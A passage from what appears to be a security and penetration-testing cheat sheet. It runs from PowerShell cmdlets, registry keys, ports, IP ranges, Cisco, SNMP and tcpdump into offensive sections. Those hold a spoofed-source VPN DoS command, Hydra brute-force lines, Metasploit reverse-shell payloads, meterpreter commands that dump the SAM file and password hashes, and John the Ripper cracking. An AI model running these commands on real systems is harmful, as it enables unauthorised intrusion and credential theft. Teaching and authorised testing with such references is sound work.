Resolve-Path # Resolves the wildcards in a path 1554 | Restart-Computer # Restart the operating system on a computer 1555 | Restart-Service # Stop and then restart a service 1556 | Restore-Computer # Restore the computer to a previous state 1557 | Restore-GPO # Restore one or all GPOs from a GPO backup 1558 | Resume-Service # Resume a suspended service 1559 | Return # Exit the current scope, (function, script, or script block) 1560 | Run/Call # Run a command (call operator) 1561 | Scheduler # Get/Set scheduled jobs 1562 | Select-Object # Select properties of objects 1563 | Select-Object # Select properties of objects 1564 | Select-String # Search through strings or files for patterns 1565 | Select-XML # Find text in an XML string or document 1566 | Send-MailMessage # Send an email message 1567 | Send-MailMessage # Send an email message 1568 | Set-Acl # Set permissions 1569 | Set-Alias # Create or change an alias 1570 | Set-AuthenticodeSignature # Place a signature in a .ps1 script or other file 1571 | Set-Content # Set content in the item (specific location) 1572 | Set-Date # Set system time on the host system 1573 | Set-ExecutionPolicy # Change the execution policy (user preference) 1574 | Set-Item # Change the value of an item 1575 | Set-ItemProperty # Set a property at the specified location to a specified value 1576 | Set-Location # Set the current working location 1577 | Set-Location # Set the current working location 1578 | Set-PSBreakpoint # Set a breakpoint on a line, command, or variable 1579 | Set-PSdebug # Turn script debugging on or off 1580 | Set-PSSessionConfiguration # Change properties of a registered session config 1581 | Set-Service # Change the start mode/properties of a service 1582 | Set-StrictMode # Enforce coding rules in expressions & scripts 1583 | Set-Tracesource # Trace a PowerShell component 1584 | Set-Variable # Set a variable and a value 1585 | Set-WmiInstance # Create or update an instance of an existing WMI class 1586 | Set-WSManInstance # Modify the management information related to a resource 1587 | Set-WSManQuickConfig # Configure the local computer for remote management 1588 | Show-EventLog # Display an event log 1589 | Sort-Object # Sort objects by property value 1590 | Sort-Object # Sort objects by property value 1591 | Split-Path # Return part of a path 1592 | Start-DscConfiguration # Apply Desired State config to nodes 1593 | Start-Job # Start a PowerShell background job 1594 | Start-Process # Start one or more processes 1595 | Start-Service # Start a stopped service 1596 | Start-Sleep # Suspend shell, script, or runspace activity 1597 | Start-Transaction # Start a new transaction 1598 | Start-Transcript # Start a transcript of a command shell session 1599 | Stop-Computer # Stop (shut down) a computer 1600 | Stop-Job # Stop a PowerShell background job 1601 | Stop-Process # Stop a running process 1602 | Stop-Process # Stop a running process 1603 | Stop-Service # Stop a running service 1604 | Stop-Transcript # Stop the transcription process 1605 | Suspend-Service # Suspend a running service 1606 | Switch # Multiple if statements 1607 | Tee-Object # Send input objects to two places 1608 | Test-ComputerSecureChannel # Test and repair the secure channel to the domain 1609 | Test-Connection # Ping one or more computers 1610 | Test-Path # Return true if the path exists, otherwise return false 1611 | Test-WSMan # Test if a computer is setup to receive remote command 1612 | Trace-Command # Trace an expression or command 1613 | Trap # Handle a terminating error 1614 | Try ... Catch # Handle a terminating error within a scriptblock 1615 | Unblock-File # Unblock files downloaded from the Internet 1616 | Undo-Transaction # Roll back a transaction 1617 | Unregister-Event # Cancel an event subscription 1618 | Unregister-PSSessionConfiguration # Configuration Delete registered PS session configuration 1619 | Update-Formatdata # Update and append format data files 1620 | Update-Help # Download and install help files 1621 | Update-List # Add and remove items from a collection 1622 | Update-TypeData # Update extended type configuration 1623 | Update-Typedata # Update the current extended type configuration 1624 | Use-Transaction # Add a command or expression to the transaction 1625 | Wait-Event # Wait until a particular event is raised 1626 | Wait-Job # Wait for a background job 1627 | Wait-Process # Wait for a process to stop 1628 | Where method # Filter objects from a collection 1629 | Where-Object # Filter the objects passed along the command pipeline 1630 | Where-Object # Filter input from the pipeline 1631 | While # Loop while a condition is True 1632 | Write-Debug # Write a debug message to the host display 1633 | Write-Error # Write an object to the error pipeline 1634 | Write-EventLog # Write an event to an event log 1635 | Write-Host # Display text on screen 1636 | Write-Host # Write customized output to the host/screen 1637 | Write-Output # Write an object to the pipeline 1638 | Write-Progress # Display a progress bar 1639 | Write-Verbose # Write a string to the host's verbose display 1640 | Write-Warning # Write a string in reverse video to the display 1641 | Zipfile # Compress or Extract zip files 1642 | 1643 | [40]: 1644 | 1645 | Windows registry 1646 | ---------------- 1647 | 1648 | ### Structure of the Windows Registry (hives)[[56]] 1649 | 1650 | HKEY_CLASSES_ROOT # Information stored here ensures that the correct program opens when it is executed in Windows Explorer. 1651 | HKEY_CURRENT_USER # Contains configuration information for the user who is currently logged into the system, including user's folders, screen colors, and Control Panel settings 1652 | HKEY_LOCAL_MACHINE # Contains machine hardware-specific information that the operating system runs on 1653 | HKEY_USERS # Contains configuration information of all user profiles on the system, which concerns application configurations, and visual settings 1654 | HKEY_CURRENT_CONFIG # Stores information about the systems current configuration. Alias for: HKLM\Config\profile 1655 | 1656 | ### Autorun locations 1657 | 1658 | HKLM\Software\Microsoft\Windows\CurrentVersion\Runonce 1659 | HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run 1660 | HKLM\Software\Microsoft\Windows\CurrentVersion\Run 1661 | HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Run 1662 | HKCU\Software\Microsoft\Windows\CurrentVersion\Run 1663 | HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 1664 | (ProfilePath)\Start Menu\Programs\Startup 1665 | 1666 | ### MRU lists 1667 | 1668 | MRU, or 'most recently used' lists contain entries made due to specific actions performed by the user. There are numerous MRU lists located throughout various Registry keys. 1669 | 1670 | HKCU\Software\Microsoft\Windows\ CurrentVersion\Explorer\RunMRU 1671 | 1672 | ### UserAssist 1673 | The UserAssist key contains two or more subkeys which have long hexadecimal names that appear as globally unique identifiers (GUIDs). Each subkey records values that pertain to specific objects the user has accessed on the system, such as Control Panel applets, shortcut files, programs, etc. 1674 | 1675 | HCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist 1676 | 1677 | These values however, are encoded using a ROT- 13 encryption algorithm, sometimes known as a Caesar cipher. This particular encryption technique is quite easy to decipher, as each character is substituted with the character 13 spaces away from it in the ASCII table. 1678 | With the UserAssist key, a forensic examiner can gain a better understanding of what types of files or applications have been accessed on a particular system. 1679 | 1680 | ### Wireless netoworks 1681 | 1682 | HKLM\SOFTWARE\ Microsoft\WZCSVC\Parameters\Interfaces key # SSIDs 1683 | HKLM\SYSTEM\ControlSet001\ Services\Tcpip\Parameters\Interfaces\ # flynn-net 1684 | 1685 | ### LAN computers 1686 | 1687 | HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComputerDescriptions. # List of devices, including desktop computers, laptops, and printers 1688 | 1689 | ### USB Devices 1690 | 1691 | HKLM\SYSTEM\ControlSet00x\Enum\USBSTOR # Key stores the contents of the product and device ID values of any USB device that has ever been connected to the system 1692 | 1693 | ### Mounted devices 1694 | 1695 | HKLM\SYSTEM\MountedDevices # Stores a database of mounted volumes that is used by the NTFS file system 1696 | 1697 | ### Firefox 1698 | Firefox has limited footprints regarding Registry activity. Firefox stores web history in a history.dat file, which is in ASCII format and plainly visible when opened. 1699 | 1700 | C:\Documents and Settings\User Profile\Application Data\Mozilla\Firefox\Profiles\x.default\ 1701 | 1702 | [56]: 1703 | 1704 | Common ports 1705 | ------------ 1706 | [[6]] 1707 | 1708 | | Port | Protocol | Description | 1709 | | ----------- |:------------------:| ------------:| 1710 | | 20 | TCP | FTP | 1711 | | 21 | TCP | FTP Control | 1712 | | 22 | TCP | SSH | 1713 | | 23 | TCP | Telnet | 1714 | | 25 | TCP | SMTP | 1715 | | 53 | UDP, TCP | DNS | 1716 | | 67 | UDP | DHCP Server | 1717 | | 68 | UDP | DHCP Client | 1718 | | 69 | UDP | TFTP | 1719 | | 80 | TCP | HTTP | 1720 | | 110 |TCP | POP3 | 1721 | | 119 | TCP | NNTP | 1722 | | 123 | UDP | NTP | 1723 | | 137 | UDP | NetBIOS Name Service | 1724 | | 138 | UDP | NetBIOS Datagram Service | 1725 | | 139 | TCP | NetBIOS Session Service | 1726 | | 143 | TCP | IMAP | 1727 | | 161 | UDP | SNMP | 1728 | | 162 | UDP | SNMP-trap | 1729 | | 389 | TCP | LDAP | 1730 | | 443 | TCP | HTTPS | 1731 | | 445 | TCP | Direct Hosting | 1732 | | 465 | TCP | SMTP | 1733 | | 546 | UDP | DHCP Client (ipv6) | 1734 | | 547 | UDP | DHCP Server (ipv6) | 1735 | | 569 | TCP | MSN | 1736 | | 587 | TCP | SMTP | 1737 | | 990 | TCP | FTPS | 1738 | | 993 | TCP | IMAP | 1739 | | 995 | TCP | POP3 | 1740 | | 1080 | TCP | SOCKS proxy | 1741 | | 1194 | TCP | OpenVPN | 1742 | | 3306 | TCP, UDP | MySQL databasesystem | 1743 | | 3389 | TCP | RDP | 1744 | | 3689 | TCP | DAAP | 1745 | | 5432 | TCP, UDP | PostgreSQL databasesystem | 1746 | | 5800 | TCP | VNC | 1747 | | 5900 | TCP | VNC | 1748 | | 6346 | TCP, UDP | Gnutella p2p network | 1749 | | 8080 | TCP | HTTP | 1750 | 1751 | [6]: 1752 | 1753 | IPv4 1754 | ---- 1755 | 1756 | ### CLASSFULL IP RANGES [[17]] 1757 | 1758 | Class A 1759 | 0. 0. 0. 0 = 00000000.00000000.00000000.00000000 1760 | 127.255.255.255 = 01111111.11111111.11111111.11111111 1761 | 0nnnnnnn.HHHHHHHH.HHHHHHHH.HHHHHHHH 1762 | 1763 | Class B 1764 | 128. 0. 0. 0 = 10000000.00000000.00000000.00000000 1765 | 191.255.255.255 = 10111111.11111111.11111111.11111111 1766 | 10nnnnnn.nnnnnnnn.HHHHHHHH.HHHHHHHH 1767 | 1768 | Class C 1769 | 192. 0. 0. 0 = 11000000.00000000.00000000.00000000 1770 | 223.255.255.255 = 11011111.11111111.11111111.11111111 1771 | 110nnnnn.nnnnnnnn.nnnnnnnn.HHHHHHHH 1772 | 1773 | Class D 1774 | 224. 0. 0. 0 = 11100000.00000000.00000000.00000000 1775 | 239.255.255.255 = 11101111.11111111.11111111.11111111 1776 | 1110XXXX.XXXXXXXX.XXXXXXXX.XXXXXXXX 1777 | 1778 | Class E 1779 | 240. 0. 0. 0 = 11110000.00000000.00000000.00000000 1780 | 255.255.255.255 = 11111111.11111111.11111111.11111111 1781 | 1111XXXX.XXXXXXXX.XXXXXXXX.XXXXXXXX 1782 | 1783 | - n: indicates a bit used for the network ID 1784 | - H: indicates a bit used for the host ID 1785 | - X: indicates a bit without a specified purpose 1786 | 1787 | ### Reserved ranges [[18]] 1788 | 1789 | 0.0.0.0/8 # Used for broadcast messages to the current ("this") 1790 | 10.0.0.0/8 # Used for local communications within a private network 1791 | 100.64.0.0/10 # Used for communications between a service provider and its subscribers when using a carrier-grade NAT 1792 | 127.0.0.0/8 # Used for loopback addresses to the local host 1793 | 169.254.0.0/16 # Used for link-local addresses between two hosts on a single link when no IP address is otherwise specified, such as would have normally been retrieved from a DHCP server 1794 | 172.16.0.0/12 # Used for local communications within a private network 1795 | 192.0.0.0/24 # Used for the IANA IPv4 Special Purpose Address Registry 1796 | 192.0.2.0/24 # Assigned as "TEST-NET" for use in documentation and examples. It should not be used publicly 1797 | 192.88.99.0/24 # Used by 6to4 anycast relays 1798 | 192.168.0.0/16 # Used for local communications within a private network 1799 | 198.18.0.0/15 # Used for testing of inter-network communications between two separate subnets 1800 | 198.51.100.0/24 # Assigned as "TEST-NET-2" for use in documentation and examples. It should not be used publicly 1801 | 203.0.113.0/24 # Assigned as "TEST-NET-3" for use in documentation and examples. It should not be used publicly 1802 | 224.0.0.0/4 # Reserved for multicast 1803 | 240.0.0.0/4 # Reserved for future use 1804 | 255.255.255.255/32 # Reserved for the "limited broadcast" destination address 1805 | 1806 | ### Subnetting [[19]] 1807 | 1808 | ![class_a_subnets.jpg](https://www.dropbox.com/s/i7k6anrqrew7q8h/class_a_subnets.jpg?dl=0&raw=1) 1809 | 1810 | ### Calculating subnet range [[20]] 1811 | 1812 | Address: 192.168.0.1 11000000.10101000.00000000 .00000001 1813 | Netmask: 255.255.255.0 = 24 11111111.11111111.11111111 .00000000 1814 | Wildcard: 0.0.0.255 00000000.00000000.00000000 .11111111 1815 | => 1816 | Network: 192.168.0.0/24 11000000.10101000.00000000 .00000000 (Class C) 1817 | Broadcast: 192.168.0.255 11000000.10101000.00000000 .11111111 1818 | HostMin: 192.168.0.1 11000000.10101000.00000000 .00000001 1819 | HostMax: 192.168.0.254 11000000.10101000.00000000 .11111110 1820 | Hosts/Net: 254 (Private Internet) 1821 | 1822 | [17]: 1823 | [18]: 1824 | [19]: 1825 | [20]: 1826 | 1827 | IPv6 1828 | ---- 1829 | 1830 | ### Broadcast addresses [[21]] 1831 | 1832 | ff02:: # Link Local: spans the same topological region as the corresponding unicast scope, i.e. all nodes on the same LAN 1833 | ff05:: # Site local: is intended to span a single site 1834 | ff08:: # Organization scope: Intended to span multiple sizes within the same organization 1835 | ff0e:: # Global scope, assigned by IANA 1836 | ff01:: # Interface local: Spans only a single interface on a node and is useful only for loopback transmission of multicast 1837 | 1838 | ### Interface adresses [[22]] 1839 | 1840 | fe80:: # link-local 1841 | 2001:: # routable 1842 | ::a.b.c.d # IPv4 compatible IPv6 1843 | ::ffff:a.b.c.d # IPv4 mapped IPv6 1844 | 1845 | ### THC Ipv6 Toolkit [[23]] 1846 | 1847 | rsmurf6 # Smurfs the local network of the victim 1848 | 1849 | 1850 | 1851 | [21]: 1852 | [22]: 1853 | [23]: 1854 | 1855 | Cisco commands 1856 | -------------- 1857 | 1858 | ### Exec commands [[4]] 1859 | 1860 | <1-99> # Session number to resume 1861 | connect # Open a terminal connection 1862 | disconnect # Disconnect an existing telnet session 1863 | enable # Turn on privileged commands 1864 | exit # Exit from Exec mode 1865 | help # Description of the interactive help system 1866 | lat # Open a lat connection 1867 | lock # Lock the terminal 1868 | login # Log in as a particular user 1869 | logout # Exit from Exec mode and log out 1870 | menu # Start a menu-based user interface 1871 | mbranch # Trace multicast route for branch of tree 1872 | mrbranch # Trace reverse multicast route to branch of tree 1873 | mtrace # Trace multicast route to group 1874 | name-connection # Name an existing telnet connection 1875 | pad # Open a X.29 PAD connection 1876 | ping # Send echo messages 1877 | resume # Resume an active telnet connection 1878 | show # Show running system information 1879 | systat # Display information about terminal lines 1880 | telnet # Open a telnet connection 1881 | terminal # Set terminal line parameters 1882 | tn3270 # Open a tn3270 connection 1883 | trace # Trace route to destination 1884 | where # List active telnet connections 1885 | x3 # Set X.3 parameters on PAD 1886 | 1887 | ### Common commands [[5]] 1888 | 1889 | ? # Help 1890 | show running-configuration # Shows the router, switch, or firewall's current configuration 1891 | copy running-configuration startup-configuration # Save the configuration that is currently being modified (in RAM), also known as the running-configuration, to the nonvolatile RAM (NVRAM) 1892 | show interface # Displays the status of the router's interfaces 1893 | show ip interface # Provides information about the configuration and status of the IP protocol and its services, on all interfaces. 1894 | config terminal, enable, interface, and router # Change modes 1895 | no shutdown # Enables an interface (brings it up) 1896 | show ip route # Show the router's routing table 1897 | show version # Gives you the router's configuration register 1898 | debug # It provides detailed debugging output on a certain application, protocol, or service 1899 | 1900 | [4]: 1901 | [5]: 1902 | 1903 | SNMP 1904 | ---- 1905 | 1906 | ### Concept [[43]] 1907 | 1908 | ![snmp.png](https://www.dropbox.com/s/srwfkxgbqyep6yo/snmp.png?dl=0&raw=1) 1909 | 1910 | ### Command Examples [[44]] 1911 | This command returns an administratively assigned name for this managed node. 1912 | 1913 | % snmpget -mALL -v1 -cpublic snmp_agent_Ip_address sysName.0 1914 | The snmpwalk command performs a sequence of chained GETNEXT requests automatically. It is a work saving command. 1915 | 1916 | % snmpwalk -mALL -v1 -cpublic snmp_agent_Ip_address system 1917 | 1918 | The snmpbulkwalk command uses the GETBULK SNMP protocol feature to query for an entire tree of information about a network entity 1919 | 1920 | % snmpbulkwalk -mALL -v2c -cprivate snmp_agent_Ip_address entPhysicalTable>time7 1921 | 1922 | 1923 | 1924 | [43]: 1925 | [44]: 1926 | 1927 | Packet Capturing 1928 | ---------------- 1929 | [[38]] 1930 | 1931 | tcpdump -i eth0 # Capture Packets From Specific Interface 1932 | tcpdump -c 5 -i eth0 # Capture Only N Number of Packets 1933 | tcpdump -A -i eth0 # Print Captured Packets in ASCII 1934 | tcpdump -D # Display Available Interfaces 1935 | tcpdump -XX -i eth0 # Display Captured Packets in HEX and ASCII 1936 | tcpdump -w 0001.pcap -i eth0 # Capture and Save Packets in a File 1937 | tcpdump -r 0001.pcap # Read Captured Packets File 1938 | tcpdump -n -i eth0 # Capture IP address Packets 1939 | tcpdump -i eth0 tcp # Capture only TCP Packets 1940 | tcpdump -i eth0 port 22 # Capture Packet from Specific Port 1941 | tcpdump -i eth0 src 192.168.0.2 # Capture Packets from source IP 1942 | tcpdump -i eth0 dst 50.116.66.139 # Capture Packets from destination IP 1943 | 1944 | [38]: 1945 | 1946 | DNS 1947 | --- 1948 | 1949 | ### dnsrecon Usage Example[[7]] 1950 | 1951 | Scan a domain (-d example.com), use a dictionary to brute force hostnames (-D /usr/share/wordlists/dnsmap.txt), do a standard scan (-t std), and save the output to a file (–xml dnsrecon.xml) 1952 | 1953 | nsrecon -d example.com -D /usr/share/wordlists/dnsmap.txt -t std --xml dnsrecon.xml 1954 | 1955 | ### Ping scan grepable output [[8]] 1956 | 1957 | # nmap -sn -oG - -iR 100 1958 | # Nmap 5.35DC18 scan initiated [time] as: nmap -sn -oG - -iR 5 1959 | Host: 93.182.218.153 () Status: Up 1960 | Host: 154.223.142.85 () Status: Down 1961 | Host: 120.128.8.97 () Status: Down 1962 | Host: 47.159.134.149 () Status: Down 1963 | Host: 24.172.4.19 () Status: Down 1964 | # Nmap done at [time] -- 5 IP addresses (1 host up) scanned in 4.25 seconds 1965 | 1966 | [7]: 1967 | [8]: 1968 | 1969 | VPN 1970 | --- 1971 | 1972 | ### Write PSK to a file[[50]] 1973 | 1974 | ike-scan -M -A vpn ip -P file 1975 | 1976 | ### DoS VPN SERVER 1977 | 1978 | ike-scan -A -t 1 --sourceip= spoof ip dst ip 1979 | 1980 | [50]: 1981 | 1982 | Brute Forcing Services 1983 | ---------------------- 1984 | 1985 | ### Hydra FTP Brute Force[[2]] 1986 | 1987 | hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX ftp -V 1988 | 1989 | ### Hydra POP3 Brute Force 1990 | 1991 | hydra -l USERNAME -P /usr/sha/wordlistsnmap.lst -f 192.168.X.XXX pop3 -V 1992 | 1993 | ### Hydra SMTP Brute Force 1994 | 1995 | hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V 1996 | 1997 | [2]: 1998 | 1999 | Exploit Research 2000 | ---------------- 2001 | [[9]] 2002 | 2003 | searchsploit windows 2003 | grep -i local # Search exploit-db for exploit, in this example windows 2003 + local esc 2004 | site:exploit-db.com exploit kernel <= 3 # Use google to search exploit-db.com for exploits 2005 | grep -R "W7" /usr/share/metasploit-framework/modules/exploit/windows/* # Search metasploit modules using grep - msf search 2006 | 2007 | [9]: 2008 | 2009 | Metasploit 2010 | ---------- 2011 | 2012 | ### Meterpreter Payloads[[36]] 2013 | 2014 | set payload windows/meterpreter/reverse_tcp # Windows reverse tcp payload 2015 | set payload windows/vncinject/reverse_tcp # Meterpreter Windows VNC Payload 2016 | set ViewOnly false 2017 | set payload linux/meterpreter/reverse_tcp # Meterpreter Linux Reverse Payload 2018 | 2019 | ### Meterpreter Cheat Sheet 2020 | 2021 | upload file c:\\windows # Meterpreter upload file to Windows target 2022 | download c:\\windows\\repair\\sam /tmp # Meterpreter download file from Windows target 2023 | download c:\\windows\\repair\\sam /tmp # Meterpreter download file from Windows target 2024 | execute -f c:\\windows\temp\exploit.exe # Meterpreter run .exe on target - handy for executing uploaded exploits 2025 | execute -f cmd -c # Creates new channel with cmd shell 2026 | ps # Meterpreter show processes 2027 | shell # Meterpreter get shell on the target 2028 | getsystem # Meterpreter attempts priviledge escalation on the target 2029 | hashdump # Meterpreter attempts to dump the hashes on the target 2030 | portfwd add –l 3389 –p 3389 –r target # Meterpreter create port forward to target machine 2031 | portfwd delete –l 3389 –p 3389 –r target # Meterpreter delete port forward 2032 | 2033 | ### Auxilary Metasploit Modules 2034 | 2035 | use auxiliary/scanner/http/dir_scanner # Metasploit HTTP directory scanner 2036 | use auxiliary/scanner/http/jboss_vulnscan # Metasploit JBOSS vulnerability scanner 2037 | use auxiliary/scanner/mssql/mssql_login # Metasploit MSSQL Credential Scanner 2038 | use auxiliary/scanner/mysql/mysql_version # Metasploit MSSQL Version Scanner 2039 | use auxiliary/scanner/oracle/oracle_login # Metasploit Oracle Login Module 2040 | 2041 | ### Metasploit Powershell Modules 2042 | 2043 | use exploit/multi/script/web_delivery # Metasploit powershell payload delivery module 2044 | post/windows/manage/powershell/exec_powershell # Metasploit upload and run powershell script through a session 2045 | use exploit/multi/http/jboss_maindeployer # Metasploit JBOSS deploy 2046 | use exploit/windows/mssql/mssql_payload # Metasploit MSSQL payload 2047 | 2048 | [36]: 2049 | 2050 | Password Cracking 2051 | ----------------- 2052 | 2053 | ## John The Ripper - JTR[[39]] 2054 | 2055 | ###JTR password cracking 2056 | 2057 | john --wordlist=/usr/share/wordlists/rockyou.txt hashes 2058 | 2059 | ### JTR forced descrypt cracking with wordlist 2060 | 2061 | john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt 2062 | 2063 | 2064 | ### JTR forced descrypt cracking with wordlist 2065 | 2066 | john --format=descrypt hash --show 2067 | 2068 | [39]: 2069 | --------------------------------------------------------------------------------